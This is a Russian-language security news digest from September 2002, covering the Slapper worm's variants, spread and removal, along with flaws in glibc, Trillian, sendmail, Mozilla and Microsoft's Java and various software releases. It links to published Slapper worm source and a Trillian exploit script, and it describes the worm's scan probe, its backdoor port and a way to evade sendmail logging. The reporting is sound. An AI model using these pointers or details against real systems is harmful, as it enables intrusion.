Тем временем появилась уже третья разновидность червя Slapper. Похоже, при такие темпах модификаций червя скоро может закончиться английский алфавит. :)Этот штамм получил название Slapper.C. В соответствии с заявлениями ISS этой разновидностью уже поражены 1,500 серверов. Источник распространения пока не выявлен. Механизм у младшего брата семейства Slapper тот же самый - использование уязвимости в библиотеке OpenSSL, используемой SSL v2.0. Cпециалисты в очередной раз настоятельно рекомендуют администраторам Вэб-серверов Апач под упралением Linux пропатчить свои системы и обновить антивирусные пакеты. Источник - http://www.vnunet.com/News/1135304
25/09/2002 Арестован автор червя Slapper.B.
В интервью VNUNET.COM Дэвид Морган, старший специалист по безопасности ISS (Inernet Security Systems) сказал следующее: "Slapper посылал адреса инфицированных машин на некий электронный адрес (мы писали об этом раньше, и приводили этот адрес - он в сети ukr.net - прим. ньюс-мейкера). Трассировка этого адреса показала, что владелец электронного адреса находится на Украине. В результате властями был арестован 21-летний гражданин этой страны". Тем временем ISC (Internet Storm Centre), поддерживаемый Sans Institute объявил, что Интернет опять попал в т.н. "зелёную" полосу опасности. После заражения 6.000 серверов ранее была объявлена "жёлтая" тревога. Всего же, по утверждениям ISS, червём было инфицировано 10.000 серверов. По этому показателю Slapper не догнал СodeRed (400,000 cерверов) и Nimda (86,000 cерверов). К слову, знаменитый червь Морриса в 1988 г. поразил 6200 машин, что составляло около 8 процентов общей численности машин в сети. Что касается самого вируса Slapper, сам его код не был новинкой, а представлял собой немного усовершенствованный код известной специалистам программы PUD (peer-to-peer UDP Distributed DoS). Тем не менее, специалисты опасаются, что сам код Slapper может быть использован в дальнейшем, для организации атак на другие операционные системы. Тем временем первоначальный червь Slapper уступил первое место Slapper. B в десятке "наиболее атакуемых портов" ('most attacked ports')-cвоеобразном хит-параде, публикуемом ISC. Подробности - http:/www.vnunet.com/News/1135274
25/09/2002 Microsoft выпустила утилиту для изменения серийного кода в Windows XP.
Недавно пираты нашли способ установки пакета обновлений Service Pack 1 (SP1) на нелицензионную версию операционной системы Windows XP. Для этого достаточно изменить серийный код этой операционной системы, поскольку при установке SP1 проверяет, не числится ли серийный код данной операционной системы в "черном списке" похищенных кодов. Чтобы изменить серийный код, пираты используют специально написанную утилиту, однако Microsoft сама пошла навстречу недобросовестным пользователям и обнародовала более простую процедуру изменения серийного кода. На официальном сайте Microsoft сообщается о том, что при попытке установить SP1 на операционную систему Windows XP, активированную при помощи похищенного серийного кода, выдается сообщение, что "серийный код Windows недействителен". По всей видимости, для того чтобы помочь добросовестным пользователям, чей серийный код по каким-либо причинам оказался в "черном списке", и которые получили в Microsoft новый серийный код, представители cлужбы поддержки опубликовали методику изменения этого кода без помощи каких-либо дополнительных программ. Для замены серийного кода необходимо либо напрямую отредактировать реестр, либо использовать специальный скрипт. Однако, для использования предлагаемой Microsoft методики необходимо иметь действительный серийный код. Новость взята с securitylab.ru. Методика - http://support.microsoft.com/default.aspx?scid=kb;en-us;Q328874
25/09/2002 Apache 2.0.42
Вышла новая версия популярного web-сервера Apache. В данном релизе исправлены баги в модуле mod_dav, а так же решены проблемы с утечкой памяти. Источник - http://httpd.apache.org ChangeLog - http://www.apache.org/dist/httpd/CHANGES_2.0
25/09/2002 Opera 6.1 для FreeBSD и Linux.
Компания OperaSoftware сообщила о выходе новой версии своего браузера для FreeBSD И Linux. Источник - http://www.osnews.com/story.php?news_id=1804 Скачать - http://web.opera.com/download/unix/untested/
24/09/2002 Solar Designer объявил о наличии дыры в glibc во всех версиях Mandrake Linux.
Возможность переполнения динамического буфера в XDR-декодере присутствует в glibc версии 2.2.5 и более ранних. XDR - это механизм кодирования структур данных для использования с RPC. В зависимости от приложения, эта ошибка может быть использована для выполнения любого кода. Также были найдены проблемы в tcl/tk. Запущенное приложение ищет библиотеки tcl/tk в /var/tmp прежде чем в каких-либо других каталогах. Это позволяет злоумышленнику, например, запустить троян и перехватить пароль рута (ожидая mkpasswd). Уязвимость касается всех версий Mandrake Linux. Источник - http://linux.kiev.ua/article.php?sid=370&mode=thread&order=0
24/09/2002 Phoenix 0.1
Первый официальный релиз нового браузера, основанного на Mozilla. Phoenix - это пользовательский интерфейс к движку Mozilla, подобный Galeon, K-Meleon и Chimera, но, в отличие от них, написанный целиком на XUL. Основная цель, которую ставили перед собой разработчики этого браузера - "скорость, скорость и еще раз скорость". Так что если Вы принадлежите к числу людей, не использующих Mozilla из-за нерасторопности пользовательского интерфейса - попробуйте Phoenix. Браузер доступен для платформ Windows и Linux. Сайт проекта - http://www.mozilla.org/projects/phoenix/ Источник - http://www.linuxcenter.ru/
24/09/2002 Slapper остановлен?
По сообщениям на LinuxToday.Com нашумевший интернет-червь Slapper, заразивший чуть более 7000 серверов, сбавил обороты. За последние несколько дней в сети можно было найти множество сравнений Slapper и других подобных ему червей (Nimda,Code Red), однако по нанесенному врему Slapper до них не дотянул (прошлой осенью жертвами Nimda стали 86000 серверов, Code Red - 400000). Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-09-23-011-26-SC-SV
24/09/2002 Компания Radware анонсирует средства защиты от червя Slapper.
Компания Radware-производитель Intelligent Application Switching (IAS), представила новое решение, призванное защитить сервера под управлением Apache от нового SSL-червя Slapper. Это решение представляет собой многоуровневую защиту. На первом уровне работает разработанный компанией модуль Radware's Application Security module, предотвращающий и блокирующий Slapper до того, как он просочится в сеть. Модуль предназначен для предотвращения 450 известных на настоящий момент атак. Пользователи модуля могут активировать защиту, добавив сигнатуру червя через пользовательский интерфейс. На втором рубеже обороны стоит разработанный компанией Radware's CertainT 100 SSL Accelerator, который предотвращает атаку, прерывая SSL-сессию, если она не представляет разрешённой секретной транзакцией. По словам компании Slapper-один из видов атак, который был предотвращён защищаемыми CertainT 100 серверами. Подробности - http://www.serverwatch.com/news/article.php/1468891
24/09/2002 Использование дополнительных .ELF сегментов в QNX
На сайте QNX.ORG.RU опубликована статья "Использование дополнительных .ELF сегментов в QNX", описывающая особенности использования сегментов данных исполняемых файлов ELF формата в QNX 6.x для внутрисистемных целей: встроенная помощь, информация о файле, ресурсы PhAB и др. Ознакомиться - http://www.qnx.org.ru/docs-devel/elf.html
24/09/2002 Закон о защите пользователей сети застрял в американском сенате.
Как сообщается на сайте Internet.com, закон о защите прав пользователей интернета, представленный в апреле этого года сенатором Эрнстом Холлингсом, скорее всего, не будет рассматриваться американским Сенатом в этом году ввиду занятости Сената в данный момент вопросами обеспечения национальной безопасности США и грядущих выборов. "Акт о личной конфиденциальности в сети" (Online Personal Privacy Act) устанавливает правила сбора информации о посетителях для всех интернет-провайдеров, владельцев веб-сайтов и компаний, предоставляющих онлайновые услуги. Согласно данному законопроекту, выполнять его требования обязаны владельцы всех коммерческих сайтов, а также некоммерческих страниц, получающих прибыль от размещения рекламы и продажи каких-либо товаров. Под определением личной информации о посетителе в законе подразумеваются имя и e-mail пользователя, а также его IP-адрес. Согласно законопроекту, пользователи веб-сайтов получат право на доступ к имеющейся о них информации, а также смогут исправить собранные данные и потребовать их удаления. В законопроект включены и другие ограничения, причем все они распостраняются на интернет-компании, не имея силы в случаях с обычными компаниями, для которых деятельность в сети не является основополагающей. Источник -http://www.compulenta.ru
24/09/2002 Новый Linux кластер будет самой большой бездисковой станцией.
Национальная лаборатория Los Alamos приобрела 2048-процессорный кластер под управлением ОС Linux стоимостью в $6 млн. Данный комплекс способен выполнять до 10 триллионов операций в секунду и превосходит всех своих предшественников. По сообщениям Los Alamos, целью данной покупки было проведение ряда исследований в ВПК. Доклад Los Alamos - http://www.linuxnetworx.com/news/9.23.2002.30-Los_Alamos_Nati.html Источник - http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,74496,00.html
24/09/2002 Руководство OWASP по построению защищённых Web-приложений.
В рамках проекта OWASP (Open Web Application Security Project) выпущена версия 1.1 "Руководства по построению защищённых Web-приложений" (в оригинале - "OWASP Guide to Building Secure Web Applications"). Это руководство рассказывает как защитить различные Web-приложения на различных платформах для предотвращения распространённых атак, таки как: cross site scripting, cookie poisoning и SQL injection. Документ выпущен на условиях лицензии GNU. Доступен в 2-х форматах - PDF (983K) и HTML. Доступен здесь - http://www.owasp.org/guide/
24/09/2002 Microsoft отрицает расширение своей деятельности на иные сферы нежели разработка ПО.
По недавним прогнозам аналитиков с точки зрения Microsoft было бы логичным расширить спектр предоставляемых услуг на ранке IT, однако, в своем докладе Стив Баллмер (президент корпорации) заявил о том, что компания не намерена заниматься чем-либо новым. В том же докладе Баллмер еще раз отметил, что Microsoft оценивает OS Linux как самую большую угрозу для себя. Источник - http://news.ft.com/servlet/ContentServer?pagename=FT.com/StoryFT/FullStory&c=StoryFT&cid=1031119574487
24/09/2002 Информация об исправлениях в реализации Java от Microsoft после применения патча MS-02-52..
Как указывает финская компания Online Solutions Ltd., занимающаяся компьютерной безопасностью, даже после применения патча, описанного в бюллетене Microsoft MS-02-52 (выпущен 18 сентября), в реализации Java от Microsoft всё равно остались уязвимости. При разрешении применения Java в Internet-зоне, враждебный Java-аплет может по-прежнему получить полный контроль над компьютером жертвы. Авторы указывают на 4 уязвимости, которые устраняет патч: 1. Конструктор класса com.ms.jdbc.odbc.JdbcOdbc может быть использован для загрузки любой DLL c локальной файловой системы. 2. Возможность доступа к классам пакета com.ms.osp. 3. Возможность доступа к защищённым методам класса com.ms.jdbc.odbc.JdbcOdbc. 4. Отсутствие ограничений при соединении с данными ODBC. Как указывается, реализация Java от SUN также имеет эти уязвимости, однако там изначально был запрещён доступ к классам подозрительным апплетам. Подробное описание - http://www.solutions.fi/index.cgi/news_2002_09_23?lang=eng Полный список уязвимостей в Java - http://www.solutions.fi/index.cgi/news_2002_09_09?lang=eng
24/09/2002 Конференция по безопасности TOORCON 2002.
27-29 сентября в Сан-Диего, штат Калифорния пройдёт ежегодная конференция по компьютерной безопасности TOORCON 2002. Конференция включает в себя лекции по компьютерной безопасности, демонстрацию современных компьютерных и аппаратных средств защиты, а так же компьютерные игры под названием RootWars, где каждый желающий может попробовать свои силы во взломе/защите серверов. Регистрация стоит 75 американских рублей. Сайт конференции - http://www.toorcon.org
24/09/2002 NetBSD 1.4 более не подерживается.
После выхода NetBSD 1.6 разработчики данной ОС в рассылке netbsd-announce заявили о прекращении поддержки и разработки данной ветви ОС: In keeping with NetBSD's policy of maintaining only the current and most recent release, the releast of NetBSD 1.6 marks the end-of-life for NetBSD 1.4. This means that the netbsd-1-4 branch will no longer be maintained. Источник - http://www.kerneltrap.com/node.php?id=426
23/09/2002 Оптимизация чтения/записи в Linux.
Новая статья на LinuxJournal.Com посвящена вопросам оптимизации операций дисковой записи/чтения в OS Linux. Автор приводит 3 метода оптимизации, путем которых добивается повышения производительности системы до 55%. Ознакомиться - http://www.linuxjournal.com/article.php?sid=6237&mode=thread&order=0&thold=0
23/09/2002 Обзор Lindows 2.0
Сразу после выхода 2-ой версии OS Lindows на NewsForge.Net был опубликован обзор данной версии Lindows. Статья описывает работу с ОС начиная с этапа установки и заканчивая работой в графическом инферфейсе. Статья - http://newsforge.com/newsforge/02/09/19/1738242.shtml?tid=23
23/09/2002 Станет ли весь софтвер бесплатным?
Небольшой обзор доли и перспектив бесплатного софта на мировом рынке программного обеспечения сегодня опубликован на Fortune.com. Ознакомиться - http://www.fortune.com/indexw.jhtml?channel=artcol.jhtml&doc_id=209584
23/09/2002 Отчет о стратегии безопасности в киберпространстве.
На днях администрация Буша представила 64-страничный отчет о стратегии кибербезопасности для конечных пользователей. Ознакомиться - http://www.whitehouse.gov/pcipb/cyberstrategy-draft.pdf Источник - http://online.securityfocus.com/news/677
23/09/2002 Появление новой разновидности Slapper.
ISS (Internet Security Systems) объявила о появлении новой разновидности червя Slapper под названием Slapper.B (первая, обнаруженная 14 сентября, называется Slapper.A). Поражает версии OpenSSL до 0.9.6d и 0.9.7 beta1. Имеет незначительные отличия от штамма А. Основные из них заключаются в следующем: 1. При создании peer-to-peer сети заражённых машин используется порт UDP 4156. 2. Имеет новую функцию "mailme()", посылающую адрес машины и адрес сервера на aion@ukr.net (занятны адрес, не правда ли? :)). 3. Cодержит новые бэкдор функции: содержит дополнительный бэкдор, слушающий порт TCP/1052 при этом до предоставления на этом порту интерактивного шелла поддерживается пароль. 4. Содержит дополнительные файлы: /tmp/httpd - бинарник червя, /tmp/update - бэкдор-процесс, /tmp/.unlock - сжатый (GZIP) файл с червём и исходником бэкдора. 5. Изменяет имя запущенного червя на httpd, чтобы не отличаться от демона Апача. Приводятся рекомендации для различных сканеров безопасности. Приводятся команды для уничтожения червя: netstat -anp | grep 4156 | grep -i UDP; pstree -p; kill -9. Для уничтожения бэкдора: ps -aux | grep update | grep apache; pstree -p; kill -9. Подробный бюллетень - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21184
23/09/2002 Шифрование с использованием физических объектов как ключей
Ученые из Массачусетского технологического университета (MIT) разрабатывают новый метод шифрования данных, в котором для получения ключей используются не математические функции, а реальные физические объекты. Модель устройства, созданная в MIT, представляет из себя сотни маленьких, диаметром в доли миллиметра, стеклянных бусинок, помещенных в оболочку из эпоксидной смолы. Такой "жетон" имеет диаметр 1 см и толщину 2,5 мм. Облучив его лазером и считав преломившиеся лучи с помощью светочувствительной матрицы, компьютер или другое цифровое устройство получает последовательность чисел, то есть ключ, длиной 2400 бит. Источник - http://www.compulenta.ru/2002/9/23/34133/
23/09/2002 Sun делает ставку на Linux.
Компания Sun Microsystems приняла решение укрепить свои позиции на рынке дешевых ПК под управлением ОС Linux, тем самым делая вызов корпорации Microsoft... Подробности - http://australianit.news.com.au/articles/0,7204,5150713%5e15344%5e%5enbv%5e15306-15321,00.html
23/09/2002 Системы, защищённые ActiveScout предотвратили заражение червём Slapper.
По заявлению представителя компании ForeScout Technologies Inc. Дорона Шикмони, ни один из Вэб-серверов, оснащённых продуктом этой фирмы ActiveScout, не пострадал от эпидемии червя Slapper, поразившей тысячи серверов в Интернете. ActiveScout-cистема предотвращения вторжения, разработанная этой фирмой. По сообщениям компании ActiveScout автоматически предотвратила проникновения червя в систему даже до того, как стало известно о Slapper, без всяких модификаций и изменений исходного кода. На сетях, где виртуальные Вэб-сервера были защищены ActiveScout при многочисленных пробах этих серверов по 80 порту, система тут же опознавала это, как пробную (подозрительную активность). После соединения по 80 порту и дальнейшем соединении на 443 порт (SSL) работа червя тут же была блокирована и блокировано дальнейшее распространение по защищаемой сети. Источник - http://www.serverwatch.com/news/article.php/1467821
23/09/2002 Выход Linux 2.5.38.
Линус Торвальдс объявил о выпуске очередной версии "девелоперского" ядра Linux. Обновлена версия для архитектуры ia64, исправлен баг в vm86-режиме, который иногда приводил к невозможности запуска XFree86 в версии 2.5.37, пофиксены PCI-драйвера, а также JFS, ACPI, сетевые драйвера. Полный Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.38
23/09/2002 Причины перехода Китая на Linux.
Как утверждает CNET, причины перевода всех правительственных учреждений Китая на Linux кроются вовсе не на любви к открытым кодам ОС Linux или стоимости лицензии на Windows, а в довольно интересном предположении. Некий источник в правительстве Китая (фамилия не называется) в беседе с одним из представителей Microsoft утверждает, что Китай опасается, что в Windows заложены некие программные "жучки", посредством которых правительство США якобы может управлять компьютерной инфраструктурой, построенной на базе Windows-систем и, в случае войны США и Китая (!), Пентагон может нажать некий программный рубильник (активизировать эти "жучки") и вырубить всю компьютерную инфраструктуру Китая. Подробности - http://msnbc-cnet.com.com/2010-1071-958721.html
23/09/2002 IBM закончила разработку наручного ПК под управлением Linux.
Совместно с Citizen компания IBM завершила разработку наручного ПК под управлением OS Linux. В текущей реализации задействовано ядро ветви 2.4, процессор от Cirrus Logic, а так же LCD дисплей (320×240). Подробности - http://www.digitimes.com/NewsShow/Article.asp?datePublish=2002/09/23&pages=04&seq=25
22/09/2002 Выход Galeon 1.2.6.
Вышла новая версия "лёгкого" интернет-броузера Galeon. Объявлено о совместимости с Mozilla 1.0.x, 1.1.x и 1.2a. Собирается на gcc 3.2. Источник - http://www.linuxorbit.com/modules.php?...
22/09/2002 Выход Lindows 2.0
Вышла вторая версия операционной системы Lindows 2.0. Из пресс-релиза: "The latest release of Lindows recognized all the hardware on an eMachine T1090 and an IBM ThinkPad T20. (Though the sound card wouldn't work on the T20--not surprising because it won't work on any other distribution I've tried.) It installed so quickly I was worried something had gone wrong, especially considering it asks for one whole gigabyte of hard drive space. It took less than five minutes to install, compared to 15 or 20 minutes for a medium-sized installation of Mandrake". Подробнее - http://newsforge.com/newsforge/02/09/19/1738242.shtml?tid=23
22/09/2002 Ошибка в sendmail.
Как указывает некий enZo (www.enzo.org), им обнаружена ошибка в исходном коде популярного MTA sendmail в версиях 8.12.х. При соединении с почтовым сервером под управлением sendmail и сформированном IDENT-ответе с длиной больше 95 символов в лог-файле можно избежать записей о попытках использования команд VRFY, EXPN, использовании почтового сервера в качестве релэя, а также скрыть IP-адрес машины при посылке почты. Связано это с тем, что в исходных кодах sendmail длина отправляемой демону логирования строки ограничена 100 символами (IDENT+95 cимволов). Опасность такого ограничения очевидна. Можно избежать записей в лог-файле адреса источника различных атак на почтовый сервер. Более подробно - http://www.enz-o.org/advisories/sendstring.txt
21/09/2002 Выход EGADS 0.9.5.
Та же Secure Software Inc. объявила о выходе GADS 0.9.5 - системмного сервиса и набора библиотек для генерации секретных случайных чисел. Содержит генератор псевдо-случайных чисел Tiny и шлюз (gateway) энтропии Tiny. В свою очередь сам Tiny является дальнейшей эволюцией Yarrow, разработанным John Kelsey и John Viega. Фактически EGADS является аналогом устройств /dev/random и /dev/urandom в Linux-системах, генерирующих случайную последовательность чисел. Применяется в криптографии и системах генерации хэшей случайных чисел. Работает в качестве системного сервиса на системах Windows 2000/XP, а также в качестве перемещаемого демона на UNIX-системах. Сайт проекта - http://www.securesw.com/egads
21/09/2002 Выход версии 2.0 RATS.
Анонсирован выход версии 2.0 инструмента под названием RATS-Rough Auditing Tool for Security. RATS-утилита, сканирующая исходный код на языках C, C++, Python, Perl и PHP для нахождения потенциально опасных вызовов функций с точки зрения безопасности. Выпускается на условии лицензии GPL. Новое в версии 2.0: рекурсивное сканирование директорий и анализ содержащихся в директориях исходников, возможность вывода результатов в формате HTMl, XML. Вывод результатов с номером строки, содержащей потенциально опасный код, добавочная поддержка баз данных. Выпускается и поддерживается Secure Software Inc. Сайт проекта - http://www.securesw.com/rats/
21/09/2002 Очередная уязвимость в Trillian.
Попутно с уязвимостью в обработке команды 'PRIVMSG' (мы сообщали об этом ранее), были также обнаружены уязвимости в обработке команды 'JOIN', принимаемой от IRC-сервера клиента протоколов icq/aim/yahoo/msn/IRC Trillian. При посылке больше 206 байтов происходит переполнение буфера с возможностью выполнения кода на машине клиента либо проведении атаки типа DoS. Также обнаружена уязвимость в IDENT-сервере, который идёт вместе с Trillian. Уязвимы всё те же версии 0.73, 0.74 и 1.0. Выпущены эксплоиты для всех версий уязвимостей как для UNIX, так и для Win32-платформ. Автор эксплоитов - Lance Fitz-Herbert. Источник - http://www.securityfocus.com
21/09/2002 Конференция ShadowCon 2002.
17 октября 2002 г. в США в г. Dahlgren, штат Вайоминг на базе Naval Surface Warfare Center состоится ежегодная конференция по компьютерной безопасности ShadowCon 2002. В конференции принимают участие эксперты в области компьютерной безопасности, IT-менеджеры, являющиеся гражданами США. Количество мест-200. Сайт конференции - http://www.TechnologyForums.com/shadowcon.htm
20/09/2002 Cтатья "Определение и удаление троянцев и подозрительных кодов в Win2K".
На сервере www.securityfocus.com опубликована статья H. Carvey "Detecting and Removing Trojans and Malicious Code from Win2K". Как пишет сам автор во вступлении, в последнее время появилось большое количество IRC-ботов, сетевых троянцев и червей, предназначенных для поражения Win2K-систем. В статье автор старается на примере конкретных шагов описать технологию обнаружения и предотвращения заражения троянцами и прочими зловредными программами системы под управлением ОС Win2K. Предназначена для администраторов Win2K. Cтатья - http://online.securityfocus.com/infocus/1627
20/09/2002 Исходный код Windows мало кому интересен
Лишь 150 из 2.300 организаций во всем мире снизошли до ознакомления с предложенными Microsoft "исходниками" операционной системы Windows, опровергая, тем самым, величайший миф об открытом коде - что исходные тексты мечтают увидеть все. Несмотря на жаркие баталии, то и дело разгорающиеся вокруг предоставления исходного кода различного ПО, лишь 150 компаний по всему миру приняли предложение Microsoft, согласившейся поделиться скрытыми секретами операционной системы Windows. Источник - http://www.novikov.com.ua/news/1017/
20/09/2002 Российские провайдеры приняли новые правила поведения в Сети.
Открытый форум интернет-сервис-провайдеров (ОФИСП) принял новую редакцию "Норм пользования сетью". Этот документ регламентирует правила поведения в русскоязычном интернете, которые должны выполнять все без исключения пользователи сети. "Нормы пользования сетью" не имеют никакого юридического статуса, однако этому своеобразному "кодексу чести" стараются следовать большинство российских провайдеров интернета. Первая версия "Норм пользования сетью", известная также как документ ofisp-005, появилась достаточно давно и легла в основу пользовательских соглашений многих провайдеров. Однако в документе имелся ряд недостатков, которые вначале этого года стали поводом для крупного скандала. Для того, чтобы избежать повторения таких скандалов в дальнейшем, ОФИСП сразу начал работу над обновленным вариантом "Норм". Окончательный текст новой редакции этого документа был опубликован 20 сентября. Новая версия "Норм пользования сетью" получила индекс ofisp-008. В ней был уточнен статус документа, а также дана более развернутая характеристика таких нарушений как рассылка спама. Появились уточнения и в других разделах "Норм", запрещающих проведение несанкционированных атак на сетевые ресурсы, фальсификацию идентификационных данных, сетевого адреса и т.д. Источник - http://www.compulenta.ru/2002/9/20/34125/ Полный текст ofisp-008 - http://www.ofisp.org/documents/ofisp-008.html
20/09/2002 Microsoft начала борьбу со спамом в Hotmail.
Компания Microsoft заключила соглашение с компанией Brightmail, разработчиком систем борьбы со спамом, пытаясь снизить количество непрошенных коммерческих сообщений, которые регулярно получают пользователи почтовой службы Hotmail. Почтой на Hotmail пользуются 110 миллионов человек, и в последнее время эта популярная служба email стала основной целью спаммеров. Для того чтобы снизить количество спама, руководство Hotmail уже ввело в действие технологию, которая распознает массовые рассылки и копирует спам в отдельную папку. Таким образом, часть спама не попадает в папку входящих сообщений. Система, разработанная компанией Brightmail, более эффективна за счет того, что спам фильтруется непосредственно на почтовом сервере, не попадая в почтовые ящики пользователя. В Brightmail утверждают, что их технология распознает до 90% сообщений, относящихся к спаму. Представитель компании Microsoft заявил, что новая система борьбы с непрошенными коммерческими сообщениями начнет работать уже этой осенью. В апреле 2001 г. компания Brightmail установила аналогичную систему борьбы со спамом на почтовые серверы, предназначенные для пользователей интернет-провайдера MSN. Источник - http://www.compulenta.ru/2002/9/20/34126/
20/09/2002 Уязвимость в Trillian.
Lance Fitz-Herbert указывает на наличие уязвимости в Trillian-клиенте, поддерживающем протоколы icq/aim/yahoo/msn и IRC. Существует возможность переполнения буфера при разборе команд 'PRIVMSG', получаемых от IRC-сервера. Если имя послыающего команду больше 206 байт, Trillian падает с перезаписью регистров. Это может позволить атакующему как выполнить произвольный код на машине "жертвы", так и использовать атаку типа DoS. Для выполнения атаки "жертва" должна быть подсоединена к IRC-серверу атакующему. Как временная мера рекомендуется соединяться только с надёжными IRC-серверами. Уязвимыми являются версии 0.73, 0.74, 1.0. На всеобщее обозрение выкинут исходник на Си под Win32, а также на Перле. Исходник на Перле - http://www.security.nnov.ru/files/sicillian.pl
20/09/2002 Уязвимости в ОС IRIX.
Согласно информационным бюллетеням SGI Inc. 20020901-01-A и 20020902-01-I, в ОС этой фирмы IRIX существуют уязвимости. Одна из них заключается в недостаточных полномочиях на файл дампа памяти и ссистемы, который создаётся на диске при аварийном отключении системы (coredumps), что позволяет локальному пользователю получить доступ к важной системной информации-версии IRIX до 6.5.15. Вторая уязвимость связана с ошибками в протоколе IGMP, что может привести (при проведении атак на этот протокол) к неработоспособности сетевого сегмента, обслуживаемого маршрутизаторами с SGI IRIX. Патч пока не выпущен. Подробности - http://www.sgi.com/support/security/
20/09/2002 Уязвимость в Microsft VM.
Microsft выпустила бюллетень по безопасности MS02-052, в котором указывается, что в реализации Microsft JVM существует уязвимость, используя которую атакующий может создать Вэб-страницу, при загрузке которой возможно выполнение произвольного кода на компьютере жертвы. Уязвимость пристуствует в Outlook. Рекомендуется установить Email Security Update. Подробно - http://www.microsoft.com/technet/security/bulletin/ms02-052.asp
19/09/2002 Инструмент для определения уязвимой версии OpenSSL.
Команда RUS-CERT (Computer Emergency Response Team) из Штутгарта опубликовала исходники программы, которая определяет уязвим ли ваш (или не ваш :)) компьютер с уcтановленным Apache и OpenSSL.. Исходник и подробное описание - http://cert.uni-stuttgart.de/advisories/openssl-sslv2-master.php А здесь лежит исходник червя Slapper - http://www.securitylab.ru/?ID=33048
19/09/2002 Слабое шифрование в ICQ.
Разработана новая атака на ICQ по типу man-in-the-middle. Уже создана программа, реализующая данную уязвимость и позволяющия читать все сообщения. Автор программы - CYBERVLAD . Называется grabble.c. Также включает в себя ещё один исходник grabcon.c, предназначенный для работы в коммутируемых (switched) сетях. Подробности - http://security.nnov.ru/search/document.asp?docid=3490
19/09/2002 Серьезная уязвимость в браузере Mozilla.
На прошлой неделе специалист по безопасности Свен Нойхаус опубликовал в рассылке Bugtraq информацию о серьезной уязвимости в браузере Mozilla. Дыра в системе безопасности может использоваться владельцами веб-сайтов, чтобы выведать, какой сайт посещается пользователем после захода на их страницу. Однако, чтобы эта информация стала доступной, пользователь Mozilla должен открыть новый сайт в том же окне, в котором находился предыдущий. При этом не имеет значения, был ли введен URL вручную или использовалась закладка. Получить информацию о том, какие сайты посещают пользователи, можно, воспользовавшись ошибкой в браузере, которая приводит к отправке неверного URL в качестве ссылки. По сообщению Свена Нойхауса, ошибка присутствует в браузере Mozilla версий 1.0, 1.0.1 и 1.1, и, возможно, в более ранних версиях программы. Заплатка для этой уязвимости пока не выпущена. Ещё сравнительно молодой проект Mozilla первый раз сталкивается с серьезной дырой в системе безопасности. К счастью, проблему легко устранить. По словам Нойхауса, достаточно отключить функцию JavaScript. Более подробно - http://bugzilla.mozilla.org/show_bug.cgi?id=145579
19/09/2002 Вирус Slapper стремительно распространяется по интернету.
Вирус Slapper, о котором мы сообщали ранее, стремительно распространяется по Всемирной сети. Компания F-Secure отслеживает динамику распространения Slapper. Для этого ее специалисты установили отдельный компьютер, который притворяется зараженным и, подсоединяясь к пиринговой сети Slapper, определяет число серверов в ней. Первые данные, полученные в воскресенье вечером, показали, что заражено 5987 серверов. В понедельник эта цифра возросла 13892 машин. Дальнейшая динамика изменения количества узлов в сети Slapper показана на графике, который вместе с другой наиболее свежей информацией можно найти на специально созданной странице F-Secure.Компания также ведет статистику количества зараженных серверов в различных доменных зонах. Большинство из узлов, зараженных вирусом, имеют цифровые адреса. По данным на 17 сентября их число составляло 4396. Затем следуют зоны .net (2319 пораженных узлов), .com (1720 серверов) и .edu (532 случая заражения). Среди национальных доменов лидирует японский .jp, в нем находятся 519 зараженных компьютеров. В российской зоне .ru насчитывается 83 зараженных компьютера, а в украинской .ua - 26 машин. Сайт проекта - http://www.f-secure.com/slapper/
19/09/2002 Новая система конфигурации ядра.
Сегодня Roman Zippel представил новую версии своей системы конфигурации ядра OS Linux. В отличии от стандартных средств, она оснащена удобным графическим интерфейсом и минимизурует вероятность неудачной сборки. Источник - http://www.kerneltrap.com/node.php?id=419
18/09/2002 Запуск MS Office под Linux.
Автор новой статьи на LinuxJournal рассказывает о методике запуска офисного пакета от MS под Linux. Статья - http://www.linuxjournal.com/article.php?sid=6153&mode=thread&order=0
18/09/2002 Oracle на 14% быстрее Microsoft SQL Server
Компания Oracle опубликовала результаты сравнения Oracle9i на Linux и Microsoft SQL Server 2000. Результаты тестирования показали превосходство в скорости Oracle на 14%. Источник - http://www.theregister.co.uk/content/53/27156.html
18/09/2002 Linux 2.5.36
Очередной релиз ядра линукс ветви 2.5. На этот раз множественные чистки в коде ext3,XFS,NTFS, исправления в IEEE-1394 и USB. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2002-09-18-014-26-NW-KN-DV
17/09/2002 Why I prefer Open Source databases
На NewsForge появился довольно занятный кратий обзор нескольких типов RDB. Нельзя сказать, что автор приводит контраргументы в пользу той или иной БД, но, тем не менее, заметка заслуживает внимания. Ознакомиться - http://newsforge.com/newsforge/02/09/14/1253246.shtml?tid=11
17/09/2002 Беспроводные и веб-сервисы наиболее уязвимы для злоумышленников
По данным исследования Infoworld IT Security Survey, наиболее уязвимы с точки зрения безопасности информационных систем услуги, оказываемые компаниями в области интернета и беспроводной связи. Кроме того, к "зоне повышенного риска" респонденты относят также услуги в области электронной коммерции и хранения данных. Тем не менее, между реально существующими угрозами и их оценкой обществом можно обнаружить серьезные различия. В частности, по данным приведенного исследования, наиболее угрожающим фактором, по оценкам 82% респондентов, указаны вирусы, однако только 58% участвующих в опросе экспертов реально сталкивались с этой проблемой. Факт "взлома" системы из 63% указавших подтверждают собственным опытом не более 22% участников опроса. Серьезно преувеличены опасения относительно "внутренних" нарушений авторизованного доступа... Подробности - http://www.cnews.ru/topnews/2002/09/17/content6.shtml
17/09/2002 Очередной обзор червя Slapper-A.
Мы уже писали о новом вирусе Slapper-A, использующем уязвимость, обнаруженную в модуле OpenSSL (mod_ssl)Вэб-сервера Апач на Линукс-системах и Intel-платформе. На сервере securityfocus.com появилась заметка Джона Лейдена "Slapper worm spanks Apache servers", детально описывающая работу Slapper, способы распространения, характерные особенности и методы борьбы. Подчёркивается, что червь используется для организации DDoS-атаки. Для обнаружения потенциально уязвимых систем сканирует сервера по 80 порту, формируя неправильный HTTP GET-запрос вида (GET / mod_ssl:error:HTTP-request HTTP/1.0). После обнаружения сервера Apache засылает эксплоит на порт 443/tcp. Дальнейшие действия червя были рассмотрены ранее в наших новостях. Исходники и бинарники червя были выкинуты для широкой публики. Администраторам рекомендуют обновить версию Apache/mod_ssl до 0.9.6e, в которой эта уязвимость отсутствует, а также обновить вирусное ПО. По данным F-Secure, на 16 сентября поражены были 6.000 серверов. Подробности - http://online.securityfocus.com/news/662
